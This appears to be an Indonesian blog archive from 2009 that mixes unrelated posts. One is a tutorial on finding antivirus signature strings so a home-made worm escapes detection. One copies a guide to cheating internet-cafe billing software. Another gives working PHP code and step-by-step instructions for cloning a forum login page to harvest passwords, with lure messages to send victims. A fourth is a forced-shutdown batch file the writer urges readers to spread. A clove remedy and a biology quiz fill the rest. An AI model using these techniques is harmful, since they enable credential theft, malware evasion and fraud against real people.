Kamis, 30 April 2009

Jika Anda adalah seorang pembaca buku Computer Worm 1, Anda mungkin pernah mendapati worm yang baru saja Anda compile dapat terdeteksi oleh suatu antivirus. Sebenarnya antivirus tersebut tidak menggunakan metode checksum dalam pendeteksian tetapi lebih cenderung mengacu string pada body file, nah artikel ini akan membongkar trik untuk mengetahui string apa yang digunakan AV hingga bisa mendeteksi worm tersebut. Trik ini bisa diaplikasikan pada mayoritas antivirus seperti?PCMAV, ANSAV, bahkan antivirus-antivirus professional.



Umumnya pada program antivirus memiliki tiga jenis cara pendeteksian yaitu File Information seperti nama file, kemudian checksum seperti CRC32 atau MD5, dan pendeteksian string signature yang langsung melihat byte pada body file. Untuk mengetahui signature yang menggunakan File Information dapat diketahui dengan mudah hanya dengan melihat informasi file tersebut seperti nama file yang menggunakan ekstensi ganda dan lain sebagainya, dan tentunya Anda akan jauh lebih mengerti dengan karakteristik worm yang Anda buat sendiri, demikian pula halnya dengan metode checksum, jika suatu antivirus menggunakan CRC32 atau MD5 Anda langsung bisa mengetahui signature apa yang digunakan antivirus tersebut, dengan mencari tahu sendiri nilai checksum file worm Anda tersebut. Tetapi dengan menggunakan string signature yang notabene melihat beberapa string pada body file, maka sulit untuk mengetahui string apa yang digunakan oleh suatu antivirus, berapa string yang digunakan oleh antivirus tersebut?,? berapa panjang string tersebut?, dan berapa jumlah section signature tersebut? ada ratusan bahkan ribuan dan jutaan kemungkinan yang bisa terjadi.

Penulis menemukan suatu cara yang penulis sebut dengan istilah ?Cut and Fill?, metode Cut and Fill ini memungkinkan untuk mengetahui string signature apa yang terkandung pada suatu file sehingga bisa terdeteksi pada suatu antivirus. Sebagai contoh suatu file memiliki isi ?cN2tR5dfWa?, dan suatu antivirus mendeteksinya sebagai malcode karena mengandung string ?tR5? yang sebelumnya tidak kita ketahui, maka cara yang bisa Anda lakukan adalah mengurangi setiap string tersebut dan melakukan uji coba scan antivirus untuk setiap kali berkurangnya string, perhatikan table uji coba scanning antivirus berikut ini:





Pengurangan String


String

Pada Body File


Status

Hasil Scan AntiVirus

0


cN2tR5dfWa


Terdeteksi

1


cN2tR5dfW


Terdeteksi

2


cN2tR5df


Terdeteksi

3


cN2tR5d


Terdeteksi

4


cN2tR5


Terdeteksi

5


cN2tR


Tidak Terdeteksi





Sampai pada pengurangan string ke-5 ternyata antivirus tidak mendeteksinya lagi, tentu karena string ?cN2tR? tidak mengandung string ?tR5?. Kemudian untuk menentukan berapa panjang karakter string tersebut dapat dilakukan dengan cara ?mengotori? bergantian tiap string tersisa yang terdeteksi yaitu dari pengurangan string ke-4 dengan string tertentu, contoh table berikut akan menggunakan string ?#? untuk ?mengotori? string tersebut





Pengotoran String ?#?


String

Pada Body File


Status

Hasil Scan AntiVirus

0


cN2tR5


Terdeteksi

1


cN2tR#


Tidak Terdeteksi

2


cN2t#5


Tidak Terdeteksi

3


cN2#R5


Tidak Terdeteksi

4


cN#tR5


Terdeteksi

5


c#2tR5


Terdeteksi





Anda perhatikan pada pengotoran ke-1, ke-2 dan ke-3 ternyata antivirus tidak mendeteksinya sebagai malcode karena tidak mengandung string ?tR5?, dengan demikian untuk menentukan string yang digunakan pada visual basic adalah dengan rumus berikut ini.





String Signature = Mid(BodyFile,Awal,Akhir)

String Signature = Mid(?cN2tR5dfWa?,4,3) ?hasilnya adalah ?tR5?



Keterangan :

Pengurangan? = Pengurangan Terdeteksi Terbesar (4)

Pengotoran??? = Pengotoran Tidak Terdeteksi Terbesar (3)

TotalBytes???? = 10 (berasal dari jumlah bytes ?cN2tR5dfWa")

Akhir???????????? = TotalBytes - Pengurangan - Pengotoran

???????????????????? = 10 - 4 - 3 ?hasilnya adalah = 3

Awal???????????? = TotalBytes - (Pengurangan + Pengotoran) + 1

???????????????????? = 10 - ( 4+3 ) + 1 ? hasilnya adalah = 4





Mudah bukan? tentu saja mudah karena contoh yang penulis berikan hanya 10 bytes, lalu bagaimana dengan file asli yang nyata kita hadapi? dimana 1 kb saja adalah 1024 bytes? Sementara umumnya malcode memiliki ukuran rata-rata lebih dari 20 kb atau 20.480 string? Ya, Anda bisa berhari-hari didepan komputer hanya untuk mengetahui sebuah string signature yang digunakan oleh suatu antivirus, terhadap file worm yang Anda buat J. Setelah beberapa kali browsing internet, penulis tidak menemukan tool yang cukup?bagus untuk dapat mengaplikasikan metode ini, yang penulis temukan hanyalah program spliter yang menurut penulis kurang sesuai, karena cara kerja program spliter bukan mengurangi byte demi byte tetapi langsung membagi file tersebut, perhatikan contoh table uji berikut :





Split

(bytes)


String Pada setiap Body File

Yang Ter-Split


Status

Hasil Scan AntiVirus

2


cN | 2t | R5 | df | Wa


Tidak Terdeteksi

3


cN2 | tR5 | dfW | a


Terdeteksi File Ke-2

4


cN2t | R5df | Wa


Tidak Terdeteksi

5


cN2tR | 5dfWa


Tidak Terdeteksi





Kekurangan utama metode spliter ini adalah, spliter tidak menyertakan header file pada setiap file hasil split, sementara keberadaan header file disyaratkan atau dibutuhkan oleh beberapa antivirus untuk bisa mendeteksi suatu malcode, dengan tool spliter ini Anda juga harus melakukan pekerjaan yang sama berulang kali untuk setiap file yang terdeteksi.



Nah untuk memanjakan pembaca, maka penulis melanjutkan riset dan berhasil membuat sebuah tool sederhana yang mampu mempermudah pekerjaan Anda. Terbundel dalam program instalasi Darmal?s DarkStudio, program pertama yang disebut Darmal?s Knife ini berfungsi untuk memotong body file dengan cara mengurangi sejumlah byte tertentu, kemudian program kedua adalah Darmal?s DirtStep yang berfungsi untuk ?mengotori? byte tertentu pada body file, program ketiga adalah Darmal?s cByte yang berfungsi sebagai pengekstrak byte untuk mengetahui string signature berdasarkan hasil dari kedua program sebelumnya, Darmal's DarkStudio dapat didownload gratis di http://darmal.blogs.friendster.com







Untuk mempermudah Anda, penulis akan memberikan contoh nyata bagaimana mencari string signature yang digunakan engine heuristic program antivirus terhadap file executable yang memiliki icon dokumen Microsoft Word. Antivirus pilihan penulis untuk uji coba kali ini jatuh pada PCMAV versi 1.6, sebuah antivirus lokal Indonesia yang mengklaim dirinya sebagai antivirus terbaik di dunia dan mengusung sebuah teknologi yang bernama ?GeneticHeuristic?, baik.. kita akan coba untuk membongkar rahasia string signature yang digunakan, tanpa perlu sedikitpun ?mengintip? file binary antivirus tersebut, apalagi melakukan reverse engineering.



1.
Penulis mengekstrak icon berdimensi 32x32 pixel dengan resolusi warna 8 bit (256 warna)?dari file ?winword.exe? dan memberinya nama file ?MSWord 32x32 8 Bit.ico?. Perlu untuk diketahui, Anda tidak boleh menggunakan icon multi dimensi dan resolusi, karena beberapa antivirus menggunakan string signature berbeda untuk masing-masing dimensi dan resolusi, hal ini akan membingungkan Anda nantinya. Jika Anda tetap ingin menggunakan icon multi dimensi dan resolusi maka Anda harus mengulangi langkah-langkah ini untuk setiap icon yang Anda inginkan dan nantinya menggabungkan kembali icon-icon tersebut. (mengenai icon multi dimensi dan resolusi akan dibahas lengkap dibuku penulis selanjutnya; Computer Worm 3)
2.
Buat sebuah file dummy, dengan cara membuat sebuah project visual basic (standard exe) tanpa memasukan code apapun selain hanya mengubah icon form dengan menggunakan icon hasil ekstrak sebelumnya. Compile project visual basic dengan nama file ?dummy.exe? dan menyimpannya didalam folder ?c:\dummy? atau path lengkapnya adalah ?c:\dummy\dummy.exe?, kemudian kompres file tersebut dengan menggunakan aplikasi compressor apapun, dalam hal ini penulis menggunakan program upx, atau Anda bisa mendownload file dummy yang?penulis sediakan pada url berikut ini:?http://www.mediafire.com/?y5wmutwvqms
3.
Pastikan terlebih dahulu file dummy yang kita buat terdeteksi oleh antivirus PCMAV, jalankan program PCMAV beri seleksi pada folder ?c:\dummy\dummy.exe?, pastikan opsi ?Scan for new unknown viruses? terseleksi kemudian klik tombol Scan, perhatikan gambar berikut ini:

?


Sesuai yang kita harapkan ternyata PCMAV mendeteksi file dummy sebagai ?Virus Suspected (WP)? penulis memperkirakan string WP pada PCMAV adalah singkatan dari Word Processor, SS (Spread Sheet), RD (Removable Disk), FL (Folder), BR (Boot Record), ?SC (Script/Source Code), OE (Outlook Express), OL (Outlook). Penulis ingatkan lagi dan perlu Anda catat bahwa file dummy terdeteksi sebagai ?Virus Suspected (WP)? bukan yang lain, karena hal ini akan sangat berpengaruh pada langkah selanjutnya. Perhatikan gambar berikut ini:

?


4.
Setelah kita memastikan file dummy terdeteksi oleh engine heuristic PCMAV maka tiba saatnya untuk menjalankan program Darmal?s Knife. Eksekusi program Darmal?s Knife, setelah jendela aplikasi tampil, klik tombol Source File kemudian akan tampil kotak dialog ?Open Source File? atur menjadi file dummy yaitu ?c:\dummy\dummy.exe?, untuk sementara ini atur opsi Step menjadi 100 (ratusan) dan opsi Limit menjadi source size dikurangi 1 yaitu 8191, kemudian klik tombol Cut, perhatikan gambar berikut ini:


Pada contoh diatas penulis membiarkan nilai Target Path dan Group Name menggunakan nilai default. Baiklah, sampai disini kita scan kembali menggunakan PCMAV, hanya saja opsi ?Location to Scan? kita atur ke Target Path program Darmal?s Knife yaitu ?c:\dummy\dummy\? perhatikan hasil scan berikut ini:


Yang perlu kita ketahui adalah file dummy dengan nilai tertinggi yang terdeteksi oleh PCMAV, jika melihat gambar tersebut diatas menurut Anda berapakah nilai tertinggi pada dummy file? ?dummy-6700.exe?? Salah!. Walaupun nilai 6700 adalah nilai tertinggi tetapi PCMAV mendeteksi nilai 6700 sebagai ?Virus Suspected (OL)? bukan sebagai ?Virus Suspected (WP)?. File dummy dengan nilai tertinggi yang terdeteksi sebagai ?Virus Suspected (WP)? adalah file ?dummy-2800.exe?. Kita sudah mengetahui nilai tertinggi untuk Step ratusan, berikutnya kita kembali menggunakan program Darmal?s Knife untuk mendapatkan nilai akhir dari Step satuan, dengan cara klik tombol Source File sehingga tampil kotak dialog ?Open Source File? atur menjadi file dummy yaitu ?c:\dummy\dummy\dummy-2800.exe?, atur opsi Step menjadi 1 (satuan) dan opsi Limit menjadi nilai Step sebelumnya yaitu 100, kemudian klik tombol Cut. Scan kembali menggunakan PCMAV, hanya saja opsi ?Location to Scan? kita atur ke Target Path program Darmal?s Knife yaitu ?c:\dummy\dummy\dummy-2800\? dari hasil scan yang penulis lakukan nilai tertinggi untuk Step satuan adalah ?c:\dummy\dummy\dummy-2800\dummy-2800-58.exe? untuk Anda ketahui nilai dummy ini ditambahkan untuk mendapatkan nilai Darmal?s Knife, dalam hal ini nilai dKnife menjadi 2858.
5.
Agar tidak membingungkan hapus semua file dummy dan sub direktori kecuali ?dummy-2800-58.exe? agar lebih mudah pindahkan juga file ini ke direktori ?c:\dummy?. Selanjutnya eksekusi program Darmal?s DirtStep, setelah jendela aplikasi tampil, klik tombol Source File kemudian akan tampil kotak dialog ?Open Source File? atur menjadi file dummy yaitu ?c:\dummy\dummy-2800-58.exe?, untuk sementara ini atur opsi Step menjadi 1 dan opsi Limit menjadi 100 jika Anda berpendapat ternyata antivirus menggunakan lebih dari 100 bytes untuk string signaturenya silahkan ubah opsi Limit sesuai dengan perkiraan Anda sendiri, kemudian klik tombol Dirt, perhatikan gambar berikut ini:


Baiklah, sampai disini kita scan kembali file dummy menggunakan PCMAV, pada opsi ?Location to Scan? kita atur ke Target Path program Darmal?s DirtStep yaitu ?c:\dummy\dummy-2800-58\? perhatikan hasil scan berikut ini:


Yang perlu kita ketahui adalah file dummy dengan nilai terendah yang terdeteksi oleh PCMAV, jika melihat gambar tersebut diatas maka nilai terendah untuk file dummy yang terdeteksi sebagai ?Virus Suspected (WP)? adalah ?dummy-2800-58-81.exe? dengan demikian nilai untuk DirtStep adalah 81.
6.
Setelah sukses mengantongi nilai dKnife dan DirtStep, maka kita bisa menggunakan program terakhir untuk mengetahui string signature yang digunakan oleh PCMAV. Eksekusi program Darmal?s cByte, setelah jendela aplikasi tampil klik tombol Browse kemudian akan tampil kotak dialog ?Open Source File? atur menjadi file master dummy yang tidak mendapat perubahan yaitu ?c:\dummy\dummy.exe?, atur nilai dKnife menjadi 2858 dan nilai DirtStep menjadi 81, kemudian klik tombol Extract, hasil string akan tampil pada frame ?Show Bytes in ASCII? klik tombol Convert untuk mengubah view mode dari ASCII menjadi nilai hexadecimal, perhatikan gambar berikut ini:


Untuk memastikan kebenaran string signature yang kita dapatkan, bisa dilakukan dengan cara membuka file dummy dengan menggunakan program hex editor, kemudian mencari nilai string signature yang didapatkan pada body file dan mengubah salah satu byte, dalam hal ini penulis mengubah byte dengan nilai hex ?EC? pada akhir byte string signature, dengan mengubahnya menjadi nilai hex ?00?. Saat di scan kembali menggunakan PCMAV, ternyata antivirus ini sudah tidak mendeteksinya lagi sebagai ?Virus Suspected (WP)?.

Jika Anda sukses melakukan langkah-langkah diatas, namun ternyata antivirus tetap berhasil mendeteksi file dummy tersebut, perhatikan kembali karena ada kemungkinan string signature tersebut terdapat di dua lokasi dari body file, juga ada kemungkinan antivirus tersebut menggunakan lebih dari satu string signature, persis seperti yang penulis temukan pada antivirus PCMAV setelah penulis mencoba dengan menggunakan exe compressor lain yaitu FSG, ternyata untuk icon 32x32 pixel dengan resolusi warna 8 bit (256 warna) pada file winword.exe, PCMAV juga melihat string signature dengan nilai hexadecimal berikut:





914F2F00D1744600B8684100BB6B4400BD6E4700BE6E4800D79D7F00

D59B7E00D89E8100DAA08300DEBDAC00DFCDC400FDEFE800FDF3

EE00FEF8F500FFFDFC008545230088482600C8917200CE967600D199

7A00D39B7C00FBE7DC00FBE9DF00FCEC





Berikut ini adalah hasil analisa lengkap icon dokumen Microsoft Word terhadap antivirus PCMAV 1.6 :





Dimensi & Resolusi


String Signature

16 x 16

4 Bit

16 Colors


FC0FFCFFFF70CFC070C7F0777F700F0C0C0CFC7F7F70CFCFC0F0

707F7F700C0F0CFC0CFF7F70C0C0C0C0C0777F700FFFFFFFFCFF0

000C0C0C0C0C0FF8F011118FFFFFFFF80111118888888888111E0001

118E000FFFFE000FFFFE000FF7000

32 x 32

4 Bit

16 Colors


C0C0C0C0C0C077777777777FFF700C0C0C0C0C0C0C0CFFFFFFFFF

FFFFF70C0FFFFFFFFFFFFC077777777777FFF700CFC0CFC0C0FFF0

CFFFFFFFFFFFFFF70C0F0C0F0C0C7FFC077777777777FFF700CFC

16 x 16

8 Bit

256 Colors


9300B9A49500C0AB9C00CBB6A600D8C2B200D7C1B100D6C0B000D4

BEAE00D2BDAD00D4C5BA00FDF5EF00FDF4ED00FEF8F300FDF8F400

C8BEB200D9D2CA00FFFFFF0000000000000000000000000000

32 x 32

8 Bit

256 Colors


914F2F00D1744600B8684100BB6B4400BD6E4700BE6E4800D79D7F00

D59B7E00D89E8100DAA08300DEBDAC00DFCDC400FDEFE800FDF3

EE00FEF8F500FFFDFC008545230088482600C8917200CE967600D199

7A00D39B7C00FBE7DC00FBE9DF00FCEC

4700BE6E4800D79D7F00D59B7E00D89E8100DAA08300DEBDAC00DF

CDC400FDEFE800FDF3EE00FEF8F500FFFDFC008545230088482600C8

917200CE967600D1997A00D39B7C00FBE7DC00FBE9DF00FCEC

48 x 48

8 Bit

256 Colors


881112658DFFFF0202020270707026E5A4D6D5BCB5CBB9C9A9898A6E

B7F600004E5B27281E7E35355A2E2A48687D5E73FE13116773FFFFFF02

020202707070E595D5BAB9B5CBB9C98BE1AA6EB7F600004F3C

D9D9D9D9D9D9D9D70270E5DE81EFD0CDCBCBC95C8BA9AAD0F600

00543E70261C43355D5D345A5435047D2B74FE074B74FFFFFFFFFF020

2020202E5AB7081DEBED3BAC96F5C8BA9D0F600002E3E708120

16x16

32 Bit

XP:rgb/a


54FFFFFFFFFFA46C54FF985939FFF4C8B7FF823504FF823504FFD0BA

ADFFFFFFFFFF883B07FFFDF4EFFFD6AE90FFFCEDE4FFFBE9DDFFE

0B699FF634935FFD58A66FFFFFFFFFFB37D66FFB96943FFAB745C

32 x 32

32 Bit

XP:rgb/a


F7FFE8C9B1FFE7C7AFFFE6C5ADFFE5C3ABFFE3C2A8FFE2C0A6FFE

1BEA4FFE0BCA1FFDEBA9FFFDDB89CFFDCB69AFFDAB498FFD9B296

FFD8B094FFD7AE91FFD6AD8FFFD5AB8EFFFCEEE5FFFCECE3FFFBEA

48 x 48

32 Bit

XP:rgb/a


3AFFDBD3CD60EDE9E6300000000000000000E99674FFE99674FFE6916E

FFE6916EFFE6916EFFE08C68FFE08C68FFDB8865FFDD855FFFD5835FF

FD78059FFD17D57FFCE7A54FFCA7651FFC67351FFC16E



Untuk mengubah salah satu byte agar tidak terdeteksi, maka dalam hal ini?Anda harus bertindak hati-hati karena trik ini cenderung mengotori gambar icon yang digunakan. Trik ini hanya mencontohkan cara melihat string signature yang kebetulan ada pada resource icon, nah untuk trik yang secara total bisa menghindari heuristic icon signature dengan sangat mudah tanpa mengotori gambar icon, anda bisa mengetahuinya hanya?di buku penulis selanjutnya; Computer Worm 3, halah :P



---- Jika Anda ingin menyadur semua atau sebagian ide atau isi, menjadikan referensi atau mempublish artikel ini pada site, blog atau media apapun maka dengan senang hati Penulis persilahkan, namun mohon kiranya untuk tetap menyebutkan nama Penulis, terima kasih. ----

============ EOF ============

Penulis : Achmad Darmal
Tarakan, Kalimantan Timur ? Indonesia
www.friendster.com/darmal | achmad_darmal@yahoo.com.sg | darmal.blogs.friendster.com

SUMBER
Dari sebuah naskah yang belum rampung, yang Penulis sebut dengan codename:
COMPUTER WORM 3 -The Biggest Secret Finally Revealed

REFERENSI
Buku Computer Worm?2 - Secret Of Underground Coding | www.jasakom.com

GREETS
Teman-teman di Jasakom.. mas S'to, psychozetic, cron of 0x00, lEO_rETRo, tomahawk
Teman-teman di Friendster.. Andi Suharto, Ian, adHie, yuanzzttt, liko, ran, eri, Bagus, Foker, Jenonk, Panggi
Teman-teman di KBT aka Komunitas Blogger Tarakan

JUST FOR YOU
Special Thanks buat pembaca yang sudah meresensikan, merekomendasikan atau memperkenalkan buku Computer Worm melalui site-site, blog, yahoo group ataupun forum-forum. Beberapa yang Penulis temukan saat surfing dengan Google! adalah sebagai berikut :

* Anggara's Site : http://locklems90.multiply.com/reviews/item/1
* Fariskhi Vidyan : http://virologi.info/virologist/modules/news/article.php?storyid=172
* Carolus Agung : http://agunk.wordpress.com/2008/01/16/dasar-perakitan-virusworm-dengan-vb6/
* Taruma : http://taruma.info/2007/05/virus-vs-worm/
* Sucks05 aka Rizky : http://sucks05.multiply.com/reviews
* AlaV anti virus : http://alhadimedia.multiply.com/journal/item/3
* EA Ngel : http://hikari-community.darkbb.com/malicious-code-malware-virus-hijack-spyware-dll-f19/dasar-perakitan-virus-worm-dengan-vb6-t215.htm
* jenonk : http://jenonk.wordpress.com/2007/07/30/ada-buku-rahasia-membuat-antivirus-menggunakan-visual-basic/

[+/-] Selengkapnya...

HOI POSTINGAN BARU NIH........




Hai pren kali ini aku posting cara untuk mencurangi billing di warnet
,biar kantong kempes online jalan terusssssssssssssssss
udah langsung aja daripada kelamaen... copas dari jasakom.com
met mbayar murah....!

Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha ( temen gue di kampunk) dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).


Thanx to: ~ Allah swt ~ #yogyafree ~ #jasakom ~ #antihackerlink ~ W1ga5 ~ Blue Spy ~ And all X-Code crew ~


[+/-] Selengkapnya...

Jumat, 03 April 2009


Cengkeh adalah salah satu hasil tanaman rempah di Indonesia. Tanaman tropis yang berasal dari Maluku ini sudah banyak dibudidayakan untuk diambil bunga dan minyaknya. Minyak cengkeh (Eugenia aromatica) dapat dihasilkan dari penyulingan serbuk kuntum cengkeh kering (clove oil), serbuk tangkai kuntum cengkeh (clove stem oil), dan daun cengkeh kering (clove leaf oil). Tanaman cengkeh dapat tumbuh dengan baik di daerah beriklim tropis. Minyak cengkeh banyak dimanfaatkan oleh dokter gigi sebagai penghilang rasa sakit. Selain itu, tanaman ini juga digunakan dalam industri farmasi, penyedap masakan, dan wewangian. Sebagai obat tradisional cengkeh memiliki khasiat mengatasi sakit gigi. Cara mengatasi sakit gigi, gigi yang berlubang disumbat dengan kapas yang telah diteteskan dengan minyak cengkeh. Atau, 10 butir cengkeh disangrai sampai halus, lalu digiling halus, dimasukkan pada lubang gigi secukupnya, lalu ditutup dengan kapas. Lakukan dua kali sehari.



[+/-] Selengkapnya...

Senin, 30 Maret 2009

Hey all ...
ketemu lagi dengan gue.... Spa yach gue :P
setelah gue mengganti username sekarang gue ingin jelasin gimana sih caranya membuat forum phiser trus tentu cara menggunakan dengan baik dan benar...

nah kita mulai saja...


pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt

nah pada file next.php masukkan code ini

Code:
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>



atau untuk lebih memudahkan anda saya sudah sedian disini...

Code:
http://www.mediafire.com/?diddyvyxkwo



setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)

copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"

dengan itu password log akan disafe di file ppp.txt

sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)

setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url

terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:

kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css

nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...

selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....


nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan :P)

1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).

nah ini contoh yang sering gue pake di forum luar sana
"Hey is this yours post?" atau "Did you uploaded this?" trus gue masukin deh
[url=phising link anda]contoh link yang ditujuh[/url]


oke demikian dari saya... maap klo kurang jelas...( gue bukan penulis yang handal )
and terakhir selamat berburu Vip/staff/moderator/ member yach..
ingat klo berhasil bagi2 disini :P

[+/-] Selengkapnya...

Minggu, 29 Maret 2009

cara menshutdown komputer secara paksa

@echo off
msg * apaan sih lo
shutdown -s -c “Error! cuma iseng az kok mas…”

ininih cara paling yahud untuk ngancurin
idup orang yang paling elo benci..
tinggal masukin aja ke notepad lalu di save ama file
yang bereksistensi bat
jadi deh. nah sekarang kita tiggal nyebarin ini mainan
ke semua orang biar pada mampus hehehehe
bwcanda kok tapi jangan bawa2 ini website low
ketahuan loh

[+/-] Selengkapnya...

Sabtu, 07 Maret 2009

Teman-Teman Selamat Mengerjakan
SOAL-SOAL BIOLOGI
BIOLOGI SEL DAN MOLEKULER 1. Pada organisme manakah berikut ini respirasi aerob terjadi? I Mammalia II. Tumbuhan tinggi A. hanya I B. hanya II C. hanya I dan III D. hanya II dan III E. I, II dan III

III. Protozoa

2. Struktur lipid mengandung semua hal berikut ini, kecuali…. A. gugus karboksil D. molekul asam lemak B. struktur dasar CH2O E. gugus OH C. molekul gliserol 3. RNA ditemukan pada.... A. nukleus saja B. sitoplasma saja C. nukleus dan sitoplasma D. protein E. asam amino 4. Selama proses respirasi, energi dipindahkan dari molekul glukosa ke molekul.... D. ATP A. ACTH E. BCG B. DNA C. RNA 5. Ribosom terlibat pada semua dari berikut ini kecuali A. Pembentukan ikatan peptida B. Aminoasilasi dari tRNA C. Pengikatan faktor protein selama elongasi D. Pengikatan aminoasil tRNA pada mRNA E. Pengikatan mRNA pada kodon inisiasi 6. Suatu galur E. coli yang tidak memiliki DNA polymerase I akan mengalami defisiensi dalam…..DNA D. degradasi A. perbaikan E. transkripsi B. metilasi C. penggabungan 7. Penyelesaian fase S dari siklus sel suatu sel mammalia ditandai dengan berikut ini kecuali A. Kandungan histon per sel dua kali lipat dibanding ketika sel berada pada G1 B. Pada DNA yang mengalami replikasi, basa-basa nitrogen yang baru terbentuk berpasangan dengan basa-basa parental C. Setiap kromosom yang mengalami replikasi memiliki empat telomer D. Sister chromatids berpisah dari satu sama lain E. Nukleus mengandung jumlah DNA yang ekivalen dengan suatu sel tetraploid yang berada pada G1
1

